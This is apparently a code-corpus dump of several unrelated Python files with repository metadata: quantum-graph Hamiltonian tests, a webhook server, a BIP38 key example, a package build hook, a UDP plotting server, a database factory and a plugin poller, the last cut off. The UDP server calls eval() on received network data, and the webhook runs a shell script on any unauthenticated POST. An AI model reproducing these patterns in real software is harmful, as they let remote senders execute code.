[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
]
)
assert np.allclose(mat.toarray(), mat_expected)
@pytest.mark.parametrize(
"g", [nx.lollipop_graph(4, 1).to_directed(), lollipop_graph_rx(4, 1, to_directed=True)]
)
def test_edges_to_wires_directed(self, g):
"""Test that edges_to_wires returns the correct mapping on a directed graph"""
r = edges_to_wires(g)
assert r == {
(0, 1): 0,
(0, 2): 1,
(0, 3): 2,
(1, 0): 3,
(1, 2): 4,
(1, 3): 5,
(2, 0): 6,
(2, 1): 7,
(2, 3): 8,
(3, 0): 9,
(3, 1): 10,
(3, 2): 11,
(3, 4): 12,
(4, 3): 13,
}
@pytest.mark.parametrize(
"g", [nx.lollipop_graph(4, 1).to_directed(), lollipop_graph_rx(4, 1, to_directed=True)]
)
def test_wires_to_edges_directed(self, g):
"""Test that wires_to_edges returns the correct mapping on a directed graph"""
r = wires_to_edges(g)
assert r == {
0: (0, 1),
1: (0, 2),
2: (0, 3),
3: (1, 0),
4: (1, 2),
5: (1, 3),
6: (2, 0),
7: (2, 1),
8: (2, 3),
9: (3, 0),
10: (3, 1),
11: (3, 2),
12: (3, 4),
13: (4, 3),
}
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_loss_hamiltonian_complete(self, g):
"""Test if the loss_hamiltonian function returns the expected result on a
manually-calculated example of a 3-node complete digraph"""
if isinstance(g, rx.PyDiGraph):
edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(sorted(g.edge_list()))}
for k, v in edge_weight_data.items():
g.update_edge(k[0], k[1], {"weight": v})
else:
edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(g.edges)}
for k, v in edge_weight_data.items():
g[k[0]][k[1]]["weight"] = v
h = loss_hamiltonian(g)
expected_ops = [
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(2),
qml.PauliZ(3),
qml.PauliZ(4),
qml.PauliZ(5),
]
expected_coeffs = [np.log(0.5), np.log(1), np.log(1.5), np.log(2), np.log(2.5), np.log(3)]
assert np.allclose(expected_coeffs, h.coeffs)
assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
assert all([type(op) is type(exp) for op, exp in zip(h.ops, expected_ops)])
def test_loss_hamiltonian_error(self):
"""Test if the loss_hamiltonian function raises ValueError"""
with pytest.raises(
ValueError, match=r"Input graph must be a nx.Graph or rx.PyGraph or rx.PyDiGraph"
):
loss_hamiltonian([(0, 1), (1, 2), (0, 2)])
@pytest.mark.parametrize(
"g", [nx.lollipop_graph(4, 1).to_directed(), lollipop_graph_rx(4, 1, to_directed=True)]
)
def test_loss_hamiltonian_incomplete(self, g):
"""Test if the loss_hamiltonian function returns the expected result on a
manually-calculated example of a 4-node incomplete digraph"""
if isinstance(g, rx.PyDiGraph):
edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(sorted(g.edge_list()))}
for k, v in edge_weight_data.items():
g.update_edge(k[0], k[1], {"weight": v})
else:
edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(g.edges)}
for k, v in edge_weight_data.items():
g[k[0]][k[1]]["weight"] = v
h = loss_hamiltonian(g)
expected_ops = [
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(2),
qml.PauliZ(3),
qml.PauliZ(4),
qml.PauliZ(5),
qml.PauliZ(6),
qml.PauliZ(7),
qml.PauliZ(8),
qml.PauliZ(9),
qml.PauliZ(10),
qml.PauliZ(11),
qml.PauliZ(12),
qml.PauliZ(13),
]
expected_coeffs = [
np.log(0.5),
np.log(1),
np.log(1.5),
np.log(2),
np.log(2.5),
np.log(3),
np.log(3.5),
np.log(4),
np.log(4.5),
np.log(5),
np.log(5.5),
np.log(6),
np.log(6.5),
np.log(7),
]
assert np.allclose(expected_coeffs, h.coeffs)
assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
assert all([type(op) is type(exp) for op, exp in zip(h.ops, expected_ops)])
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_self_loop_raises_error(self, g):
"""Test graphs with self loop raises ValueError"""
if isinstance(g, rx.PyDiGraph):
edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(g.edges())}
for k, v in complete_edge_weight_data.items():
g.update_edge(k[0], k[1], {"weight": v})
g.add_edge(1, 1, "") # add self loop
else:
edge_weight_data = {edge: (i + 1) * 0.5 for i, edge in enumerate(g.edges)}
for k, v in edge_weight_data.items():
g[k[0]][k[1]]["weight"] = v
g.add_edge(1, 1) # add self loop
with pytest.raises(ValueError, match="Graph contains self-loops"):
loss_hamiltonian(g)
def test_missing_edge_weight_data_raises_error(self):
"""Test graphs with no edge weight data raises `KeyError`"""
g = nx.complete_graph(3).to_directed()
with pytest.raises(KeyError, match="does not contain weight data"):
loss_hamiltonian(g)
def test_missing_edge_weight_data_without_weights(self):
"""Test graphs with no edge weight data raises `KeyError`"""
g = rx.generators.mesh_graph(3, [0, 1, 2])
with pytest.raises(TypeError, match="does not contain weight data"):
loss_hamiltonian(g)
def test_square_hamiltonian_terms(self):
"""Test if the _square_hamiltonian_terms function returns the expected result on a fixed
example"""
coeffs = [1, -1, -1, 1]
ops = [qml.Identity(0), qml.PauliZ(0), qml.PauliZ(1), qml.PauliZ(3)]
expected_coeffs = [
1,
-1,
-1,
1,
-1,
1,
1,
-1,
-1,
1,
1,
-1,
1,
-1,
-1,
1,
]
expected_ops = [
qml.Identity(0),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(3),
qml.PauliZ(0),
qml.Identity(0),
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0) @ qml.PauliZ(3),
qml.PauliZ(1),
qml.PauliZ(0) @ qml.PauliZ(1),
qml.Identity(0),
qml.PauliZ(1) @ qml.PauliZ(3),
qml.PauliZ(3),
qml.PauliZ(0) @ qml.PauliZ(3),
qml.PauliZ(1) @ qml.PauliZ(3),
qml.Identity(0),
]
squared_coeffs, squared_ops = _square_hamiltonian_terms(coeffs, ops)
assert squared_coeffs == expected_coeffs
assert all(
[
op1.name == op2.name and op1.wires == op2.wires
for op1, op2 in zip(expected_ops, squared_ops)
]
)
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_inner_out_flow_constraint_hamiltonian(self, g):
"""Test if the _inner_out_flow_constraint_hamiltonian function returns the expected result
on a manually-calculated example of a 3-node complete digraph relative to the 0 node"""
h = _inner_out_flow_constraint_hamiltonian(g, 0)
expected_ops = [
qml.Identity(0),
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0),
qml.PauliZ(1),
]
expected_coeffs = [2, 2, -2, -2]
assert np.allclose(expected_coeffs, h.coeffs)
for i, expected_op in enumerate(expected_ops):
assert str(h.ops[i]) == str(expected_op)
assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
@pytest.mark.parametrize("g", [nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])])
def test_inner_out_flow_constraint_hamiltonian_error(self, g):
"""Test if the _inner_out_flow_constraint_hamiltonian function raises ValueError"""
with pytest.raises(ValueError, match=r"Input graph must be a nx.DiGraph or rx.PyDiGraph"):
_inner_out_flow_constraint_hamiltonian(g, 0)
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_inner_net_flow_constraint_hamiltonian(self, g):
"""Test if the _inner_net_flow_constraint_hamiltonian function returns the expected result on a manually-calculated
example of a 3-node complete digraph relative to the 0 node"""
h = _inner_net_flow_constraint_hamiltonian(g, 0)
expected_ops = [
qml.Identity(0),
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0) @ qml.PauliZ(2),
qml.PauliZ(0) @ qml.PauliZ(4),
qml.PauliZ(1) @ qml.PauliZ(2),
qml.PauliZ(1) @ qml.PauliZ(4),
qml.PauliZ(2) @ qml.PauliZ(4),
]
expected_coeffs = [4, 2, -2, -2, -2, -2, 2]
assert np.allclose(expected_coeffs, h.coeffs)
for i, expected_op in enumerate(expected_ops):
assert str(h.ops[i]) == str(expected_op)
assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
@pytest.mark.parametrize("g", [nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])])
def test_inner_net_flow_constraint_hamiltonian_error(self, g):
"""Test if the _inner_net_flow_constraint_hamiltonian function returns raises ValueError"""
with pytest.raises(ValueError, match=r"Input graph must be a nx.DiGraph or rx.PyDiGraph"):
_inner_net_flow_constraint_hamiltonian(g, 0)
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_inner_out_flow_constraint_hamiltonian_non_complete(self, g):
"""Test if the _inner_out_flow_constraint_hamiltonian function returns the expected result
on a manually-calculated example of a 3-node complete digraph relative to the 0 node, with
the (0, 1) edge removed"""
g.remove_edge(0, 1)
h = _inner_out_flow_constraint_hamiltonian(g, 0)
expected_ops = [qml.PauliZ(wires=[0])]
expected_coeffs = [0]
assert np.allclose(expected_coeffs, h.coeffs)
for i, expected_op in enumerate(expected_ops):
assert str(h.ops[i]) == str(expected_op)
assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_inner_net_flow_constraint_hamiltonian_non_complete(self, g):
"""Test if the _inner_net_flow_constraint_hamiltonian function returns the expected result on a manually-calculated
example of a 3-node complete digraph relative to the 0 node, with the (1, 0) edge removed"""
g.remove_edge(1, 0)
h = _inner_net_flow_constraint_hamiltonian(g, 0)
expected_ops = [
qml.Identity(0),
qml.PauliZ(0),
qml.PauliZ(1),
qml.PauliZ(3),
qml.PauliZ(0) @ qml.PauliZ(1),
qml.PauliZ(0) @ qml.PauliZ(3),
qml.PauliZ(1) @ qml.PauliZ(3),
]
expected_coeffs = [4, -2, -2, 2, 2, -2, -2]
assert np.allclose(expected_coeffs, h.coeffs)
for i, expected_op in enumerate(expected_ops):
assert str(h.ops[i]) == str(expected_op)
assert all([op.wires == exp.wires for op, exp in zip(h.ops, expected_ops)])
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_out_flow_constraint(self, g):
"""Test the out-flow constraint Hamiltonian is minimised by states that correspond to
subgraphs that only ever have 0 or 1 edge leaving each node
"""
h = out_flow_constraint(g)
m = wires_to_edges(g)
wires = len(g.edge_list() if isinstance(g, rx.PyDiGraph) else g.edges)
# We use PL to find the energies corresponding to each possible bitstring
dev = qml.device("default.qubit", wires=wires)
def states(basis_state, **kwargs):
qml.BasisState(basis_state, wires=range(wires))
cost = catch_warn_ExpvalCost(states, h, dev, optimize=True)
# Calculate the set of all bitstrings
bitstrings = itertools.product([0, 1], repeat=wires)
# Calculate the corresponding energies
energies_bitstrings = (
(cost(np.array(bitstring)).numpy(), bitstring) for bitstring in bitstrings
)
for energy, bs in energies_bitstrings:
# convert binary string to wires then wires to edges
wires_ = tuple(i for i, s in enumerate(bs) if s != 0)
edges = tuple(m[w] for w in wires_)
# find the number of edges leaving each node
if isinstance(g, rx.PyDiGraph):
num_edges_leaving_node = {node: 0 for node in g.nodes()}
else:
num_edges_leaving_node = {node: 0 for node in g.nodes}
for e in edges:
num_edges_leaving_node[e[0]] += 1
# check that if the max number of edges is <=1 it corresponds to a state that minimizes
# the out_flow_constraint Hamiltonian
if max(num_edges_leaving_node.values()) > 1:
assert energy > min(energies_bitstrings)[0]
elif max(num_edges_leaving_node.values()) <= 1:
assert energy == min(energies_bitstrings)[0]
@pytest.mark.parametrize("g", [nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])])
def test_out_flow_constraint_undirected_raises_error(self, g):
"""Test `out_flow_constraint` raises ValueError if input graph is not directed"""
with pytest.raises(ValueError):
out_flow_constraint(g)
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_net_flow_constraint(self, g):
"""Test if the net_flow_constraint Hamiltonian is minimized by states that correspond to a
collection of edges with zero flow"""
h = net_flow_constraint(g)
m = wires_to_edges(g)
wires = len(g.edge_list() if isinstance(g, rx.PyDiGraph) else g.edges)
# We use PL to find the energies corresponding to each possible bitstring
dev = qml.device("default.qubit", wires=wires)
def energy(basis_state, **kwargs):
qml.BasisState(basis_state, wires=range(wires))
cost = catch_warn_ExpvalCost(energy, h, dev, optimize=True)
# Calculate the set of all bitstrings
states = itertools.product([0, 1], repeat=wires)
# Calculate the corresponding energies
energies_states = ((cost(np.array(state)).numpy(), state) for state in states)
# We now have the energies of each bitstring/state. We also want to calculate the net flow of
# the corresponding edges
for energy, state in energies_states:
# This part converts from a binary string of wires selected to graph edges
wires_ = tuple(i for i, s in enumerate(state) if s != 0)
edges = tuple(m[w] for w in wires_)
# Calculates the number of edges entering and leaving a given node
if isinstance(g, rx.PyDiGraph):
in_flows = np.zeros(len(g.nodes()))
out_flows = np.zeros(len(g.nodes()))
else:
in_flows = np.zeros(len(g.nodes))
out_flows = np.zeros(len(g.nodes))
for e in edges:
in_flows[e[0]] += 1
out_flows[e[1]] += 1
net_flow = np.sum(np.abs(in_flows - out_flows))
# The test requires that a set of edges with zero net flow must have a corresponding
# bitstring that minimized the energy of the Hamiltonian
if net_flow == 0:
assert energy == min(energies_states)[0]
else:
assert energy > min(energies_states)[0]
@pytest.mark.parametrize("g", [nx.complete_graph(3), rx.generators.mesh_graph(3, [0, 1, 2])])
def test_net_flow_constraint_undirected_raises_error(self, g):
"""Test `net_flow_constraint` raises ValueError if input graph is not directed"""
with pytest.raises(ValueError):
h = net_flow_constraint(g)
@pytest.mark.parametrize(
"g", [nx.complete_graph(3).to_directed(), rx.generators.directed_mesh_graph(3, [0, 1, 2])]
)
def test_net_flow_and_out_flow_constraint(self, g):
"""Test the combined net-flow and out-flow constraint Hamiltonian is minimised by states that correspond to subgraphs
that qualify as simple_cycles
"""
g = nx.complete_graph(3).to_directed()
h = net_flow_constraint(g) + out_flow_constraint(g)
m = wires_to_edges(g)
wires = len(g.edge_list() if isinstance(g, rx.PyDiGraph) else g.edges)
# Find the energies corresponding to each possible bitstring
dev = qml.device("default.qubit", wires=wires)
def states(basis_state, **kwargs):
qml.BasisState(basis_state, wires=range(wires))
cost = catch_warn_ExpvalCost(states, h, dev, optimize=True)
# Calculate the set of all bitstrings
bitstrings = itertools.product([0, 1], repeat=wires)
# Calculate the corresponding energies
energies_bitstrings = (
(cost(np.array(bitstring)).numpy(), bitstring) for bitstring in bitstrings
)
def find_simple_cycle(list_of_edges):
"""Returns True if list_of_edges contains a permutation corresponding to a simple cycle"""
permutations = list(itertools.permutations(list_of_edges))
for edges in permutations:
if edges[0][0] != edges[-1][-1]: # check first node is equal to last node
continue
all_nodes = []
for edge in edges:
for n in edge:
all_nodes.append(n)
inner_nodes = all_nodes[
1:-1
] # find all nodes in all edges excluding the first and last nodes
nodes_out = [
inner_nodes[i] for i in range(len(inner_nodes)) if i % 2 == 0
] # find the nodes each edge is leaving
node_in = [
inner_nodes[i] for i in range(len(inner_nodes)) if i % 2 != 0
] # find the nodes each edge is entering
if nodes_out == node_in and (
len([all_nodes[0]] + nodes_out) == len(set([all_nodes[0]] + nodes_out))
): # check that each edge connect to the next via a common node and that no node is crossed more than once
return True
for energy, bs in energies_bitstrings:
# convert binary string to wires then wires to edges
wires_ = tuple(i for i, s in enumerate(bs) if s != 0)
edges = tuple(m[w] for w in wires_)
if len(edges) and find_simple_cycle(edges):
assert energy == min(energies_bitstrings)[0]
elif len(edges) and not find_simple_cycle(edges):
assert energy > min(energies_bitstrings)[0]
| [
"[email protected]"
]
| |
78bb32bf7c2e23216cb019c336e44b0b0ba11969 | 97c37b210fad85895f35b7db183a52cf6c37504f | /webhook.py | 1f1c1aaeea9975e4e4de3c8e1b1c17e5a5454547 | []
| no_license | polakowo/py-webhook | 9762b4c810f6cc81d73e0451f298070354102f5a | ee1c38b0ceccdc056fcf121ca45d5c7949ac7075 | refs/heads/master | 2021-01-23T23:53:11.194683 | 2018-02-24T14:10:20 | 2018-02-24T14:10:20 | 122,743,148 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,025 | py | #!/usr/bin/env python3
from http.server import BaseHTTPRequestHandler, HTTPServer
hostName = ""
hostPort = 8555
def execute():
print("Script is being executed")
import subprocess
subprocess.call(['sh', './script.sh'])
class MyServer(BaseHTTPRequestHandler):
def do_POST(self):
print("Request received")
self.send_response(200)
self.end_headers()
# Redeploy
content_length = int(self.headers['Content-Length'])
post_data = self.rfile.read(content_length).decode("utf-8")
import json
payload = json.loads(post_data)
# Add logic here
execute()
def run():
host_address = (hostName, hostPort)
myServer = HTTPServer(host_address, MyServer)
print("Webhook listening - %s:%s" % host_address)
try:
myServer.serve_forever()
except KeyboardInterrupt:
pass
finally:
myServer.server_close()
print("Webhook stopped - %s:%s" % host_address)
if __name__ == "__main__":
run()
| [
"[email protected]"
]
| |
2993e71ab0448d4ec4870ceb291435ef26e334d5 | 63ace5832d453e325681d02f6496a0999b72edcb | /examples/bip38_ec.py | c454a9f615016da836de3cf8a3ab9a067af476d8 | [
"MIT"
]
| permissive | ebellocchia/bip_utils | c9ec04c687f4247e57434319e36b2abab78f0b32 | d15c75ddd74e4838c396a0d036ef6faf11b06a4b | refs/heads/master | 2023-09-01T13:38:55.567370 | 2023-08-16T17:04:14 | 2023-08-16T17:04:14 | 251,130,186 | 244 | 88 | MIT | 2023-08-23T13:46:19 | 2020-03-29T20:42:48 | Python | UTF-8 | Python | false | false | 2,472 | py | """Example of private key encryption/decryption with EC multiplication using BIP38."""
import binascii
from bip_utils import Bip38Decrypter, Bip38EcKeysGenerator, Bip38Encrypter, Bip38PubKeyModes, WifEncoder
# BIP38 passphrase
passphrase = "DummyPassphrase"
# Generate an intermediate passphrase without lot and sequence numbers
int_pass = Bip38EcKeysGenerator.GenerateIntermediatePassphrase(passphrase)
print(f"Intermediate passphrase: {int_pass}")
# Generate an encrypted private key from the intermediate passphrase
priv_key_enc = Bip38EcKeysGenerator.GeneratePrivateKey(int_pass, Bip38PubKeyModes.COMPRESSED)
print(f"Encrypted private key (no lot/sequence): {priv_key_enc}")
# Decrypt
priv_key_dec, pub_key_mode = Bip38Decrypter.DecryptEc(priv_key_enc, passphrase)
print(f"Decrypted private key (bytes): {binascii.hexlify(priv_key_dec)}")
print(f"Decrypted private key (WIF): {WifEncoder.Encode(priv_key_dec, pub_key_mode=pub_key_mode)}")
# Generate an intermediate passphrase with lot and sequence numbers
int_pass = Bip38EcKeysGenerator.GenerateIntermediatePassphrase(passphrase,
lot_num=100000,
sequence_num=1)
print(f"Intermediate passphrase: {int_pass}")
# Generate an encrypted private key from the intermediate passphrase
priv_key_enc = Bip38EcKeysGenerator.GeneratePrivateKey(int_pass, Bip38PubKeyModes.UNCOMPRESSED)
print(f"Encrypted private key (with lot/sequence): {priv_key_enc}")
# Decrypt
priv_key_dec, pub_key_mode = Bip38Decrypter.DecryptEc(priv_key_enc, passphrase)
print(f"Decrypted private key (bytes): {binascii.hexlify(priv_key_dec)}")
print(f"Decrypted private key (WIF): {WifEncoder.Encode(priv_key_dec, pub_key_mode=pub_key_mode)}")
# Or, you can use Bip38Encrypter for generating keys in one-shot
priv_key_enc = Bip38Encrypter.GeneratePrivateKeyEc(passphrase,
Bip38PubKeyModes.COMPRESSED,
lot_num=100000,
sequence_num=1)
print(f"Encrypted private key (with Bip38Encrypter): {priv_key_enc}")
# Decrypt
priv_key_dec, pub_key_mode = Bip38Decrypter.DecryptEc(priv_key_enc, passphrase)
print(f"Decrypted private key (bytes): {binascii.hexlify(priv_key_dec)}")
print(f"Decrypted private key (WIF): {WifEncoder.Encode(priv_key_dec, pub_key_mode=pub_key_mode)}")
| [
"[email protected]"
]
| |
bd9959ca27e75ccb48e9805f865384b753390f96 | d35a60fd5242080d87c6408f8f9c2f087c754883 | /server/serverWithDraw.py | 57c22bdc885c0a16c0880c4ae4dfa2911fc17245 | []
| no_license | zhengchengyy/BBDetection | 765bfab717760f319568b991fb38ede64e626629 | 0aa192437dc5cf7526dcceab993a710b712933f7 | refs/heads/master | 2020-04-01T08:34:45.658324 | 2019-11-14T12:47:17 | 2019-11-14T12:47:17 | 153,037,386 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,923 | py | import pyformulas as pf
import threading
import socketserver
import os
import matplotlib.pyplot as plt
import numpy as np
# configurate the figure
import matplotlib as mpl
mpl.rc('lines', linewidth=1, color='r', linestyle='-')
plt.rcParams['figure.figsize'] = (10.0, 6.0)
class PlotThread(threading.Thread):
def __init__(self, xs, ys):
super(PlotThread, self).__init__()
self.xs = xs
self.ys = ys
self.xindicator = -1
def run(self):
fig = plt.figure()
canvas = np.zeros((480, 640))
screen = pf.screen(canvas, 'Examine')
# plt.ylim(0.4, 1.6)
plt.ylim(0.6, 1.0)
# plt.ylim(-0.5, 2)
# plt.ylim(0.695, 0.705)
# plt.ylim(0.76, 0.77)
# plt.ylim(1730, 1750)
# plt.ylim(0.81,0.8125)
while True:
# threadLock.acquire()
plt.xlim(xs[-1] - 20, xs[-1] + 2)
plt.plot(self.xs, self.ys, c='blue')
# threadLock.release()
fig.canvas.draw()
image = np.fromstring(fig.canvas.tostring_rgb(), dtype=np.uint8, sep='')
image = image.reshape(fig.canvas.get_width_height()[::-1] + (3,))
screen.update(image)
class ThreadedUDPRequestHandler(socketserver.BaseRequestHandler):
def __init__(self, request, client_address, server):
self.request = request
self.client_address = client_address
self.server = server
try:
self.handle()
finally:
self.finish()
def updateData(self, x, y):
# threadLock.acquire()
xs.append(x)
ys.append(y)
if len(xs) > 50:
del xs[0]
del ys[0]
# xs.pop(0)
# ys.pop(0)
# threadLock.release()
def handle(self):
# transform original data
data, addr = self.request[1].recvfrom(1024) # 收到字节数组(bytes)数据,request[1]为socket
str = data.decode('utf-8') # 解码成utf-8格式的字符串
dic = eval(str)[0] # 转换成字典,eval()函数用来执行一个字符串表达式,并返回表达式的值。
volt = dic['voltage']
time = dic['time']
# update data
self.updateData(time, volt)
class ThreadedUDPServer(socketserver.ThreadingMixIn, socketserver.UDPServer):
pass
if __name__ == "__main__":
threadLock = threading.Lock()
xs = [0]
ys = [0]
plotThread = PlotThread(xs, ys)
plotThread.start()
HOST, PORT = "", 20000
server = ThreadedUDPServer((HOST, PORT), ThreadedUDPRequestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
print("Server loop running in thread:", server_thread.name)
print(" .... waiting for connection")
# Activate the server; this will keep running until you
# interrupt the program with Ctrl-C
server.serve_forever() | [
"[email protected]"
]
| |
52b05d3878abcb4c78e0e865d6199cb611986340 | 891127dfec1e5255cd403f4aedbe0ef18b5c8567 | /python-notify2/lilac.py | 8678e267dc883732492e08565ebc85e226202699 | []
| no_license | kktt007/repo | df708b5841474fbbf720994f9278a906a908b63b | fc039d08425081834384f84c8ffe9d3923849165 | refs/heads/master | 2020-04-03T06:03:10.517303 | 2018-10-28T11:23:08 | 2018-10-28T11:23:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | #!/usr/bin/env python3
#
# This file is the most simple lilac.py file,
# and it suits for most packages in AUR.
#
from lilaclib import *
build_prefix = 'extra-x86_64'
post_build = aur_post_build
def pre_build():
aur_pre_build()
need_rebuild = False
for line in edit_file('PKGBUILD'):
# edit PKGBUILD
if line.strip().startswith("depends="):
words = line.split(" ")
words.insert(-1, "'python-setuptools'")
line = " ".join(words)
if line.strip().startswith("pkgver=0.3"):
need_rebuild = True
if need_rebuild and line.strip().startswith("pkgrel=1"):
line = "pkgrel=2"
print(line)
if __name__ == '__main__':
single_main()
| [
"[email protected]"
]
| |
ca5216e0c168037fe25b76c19ba7275392c36af3 | f41bd639f249ef6029e310bee84c6ef03f5d6f19 | /databundles/database/__init__.py | 8a086a851a744ff6f4b771d0f9f09df297feec4a | []
| no_license | kball/databundles | 5e3d478c1977a0481d77131dd573c8f199e2c95d | 142f20705c8be6cb136adef3a94c8fa7b7119b88 | refs/heads/master | 2021-01-21T03:30:32.822333 | 2014-01-23T23:57:57 | 2014-01-23T23:57:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,795 | py | """
Copyright (c) 2013 Clarinova. This file is licensed under the terms of the
Revised BSD License, included in this distribution as LICENSE.txt
"""
from __future__ import absolute_import
from ..dbexceptions import ConfigurationError
from collections import namedtuple
def new_database(config, bundle=None, class_=None):
service = config['driver']
if 'class' in config and class_ and config['class'] != class_:
raise ConfigurationError("Mismatch in class configuration {} != {}".format(config['class'], class_))
class_ = config['class'] if 'class' in config else class_
k = (service,class_)
if k == ('sqlite',None):
from .sqlite import SqliteBundleDatabase #@UnresolvedImport
return SqliteBundleDatabase(bundle=bundle, **config)
elif k == ('mysql',None):
raise NotImplemented()
elif k == ('postgres',None):
from .relational import RelationalDatabase #@UnresolvedImport
return RelationalDatabase(**config)
elif k == ('postgis',None):
from .postgis import PostgisDatabase #@UnresolvedImport
return PostgisDatabase(**config)
elif k == ('sqlite','bundle'):
from .sqlite import SqliteBundleDatabase #@UnresolvedImport
return SqliteBundleDatabase(bundle=bundle, **config)
elif k == ('sqlite','warehouse'):
from .sqlite import SqliteWarehouseDatabase #@UnresolvedImport
dbname = config['dbname']
del config['dbname']
return SqliteWarehouseDatabase(dbname, **config)
elif k == ('mysql','warehouse'):
raise NotImplemented()
elif k == ('postgres','warehouse'):
raise NotImplemented()
class DatabaseInterface(object):
@property
def name(self):
raise NotImplementedError()
def exists(self):
raise NotImplementedError()
def create(self):
raise NotImplementedError()
def add_post_create(self, f):
raise NotImplementedError()
def delete(self):
raise NotImplementedError()
def open(self):
raise NotImplementedError()
def close(self):
raise NotImplementedError()
def inserter(self, table_or_name=None,**kwargs):
raise NotImplementedError()
def updater(self, table_or_name=None,**kwargs):
raise NotImplementedError()
def commit(self):
raise NotImplementedError()
def tables(self):
raise NotImplementedError()
def has_table(self, table_name):
raise NotImplementedError()
def create_table(self, table):
raise NotImplementedError()
def drop_table(self, table_name):
raise NotImplementedError()
| [
"[email protected]"
]
| |
eca77010769b565283b9e1d850d441836c5dc8f3 | 990b92264109dc01dbfddeb6f5e75675037fd829 | /app/cito_engine/poller/pluginpoller.py | 123be6b2b244c4a01e2c2503321bc5c5146f53f8 | [
"Apache-2.0"
]
| permissive | CitoEngine/cito_engine | 20efa189abab1b684b60b260c1ea9ed16f6ea0f2 | 95852dd109d86a344726d7b11ed1132d4e48426b | refs/heads/master | 2020-05-21T15:04:24.011603 | 2019-02-08T04:51:42 | 2019-02-08T04:51:42 | 17,123,947 | 9 | 13 | Apache-2.0 | 2019-02-08T04:51:43 | 2014-02-24T03:17:04 | Python | UTF-8 | Python | false | false | 3,548 | py | # Django settings for cito project.
# Copyright (c) 2012-2013 Cyrus Dasadia <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import requests
import logging
from cito_engine.models import Plugin, PluginServer
logger = logging.getLogger('poller_logger')
def pluginpoller(server):
url = server.url+'/getallplugins'
try:
response = requests.get(url, verify=server.ssl_verify)
except Exception, e:
logger.error('Could not connect to PluginServer: %s [EXCEPTION] %s' % (url, e))
return False
try:
jsondata = response.json()
except:
logger.error('PluginServer: %s gave invalid JSON response')
return False
logger.info("Found %s plugins" % len(jsondata))
pluginNames = []
#Add or update plugins
for k in jsondata:
pluginNames.append(k['plugins']['name'])
try:
p = Plugin.objects.get(server=server, name__iexact=k['plugins']['name'])
p.description = k['plugins']['description']
p.status = k['plugins']['status']
p.save()
logger.info("Plugin: %s already existed and updated" % k['plugins']['name'])
except Plugin.DoesNotExist:
Plugin.objects.create(server=server,
name=k['plugins']['name'],
description=k['plugins']['description'],
status=k['plugins']['status'])
logger.info('Plugin: %s added' % k['plugins']['name'])
except Plugin.MultipleObjectsReturned:
logger.error("More than one plugin exists for %s, remove the duplicates!" % k['plugins']['name'])
except Exception as e:
logger.error("Could not add plugin, reason:%s" % e)
#Disable all deprecated plugins
plugins = Plugin.objects.filter(server=server)
if plugins is not None:
for p in plugins:
if p.name not in pluginNames:
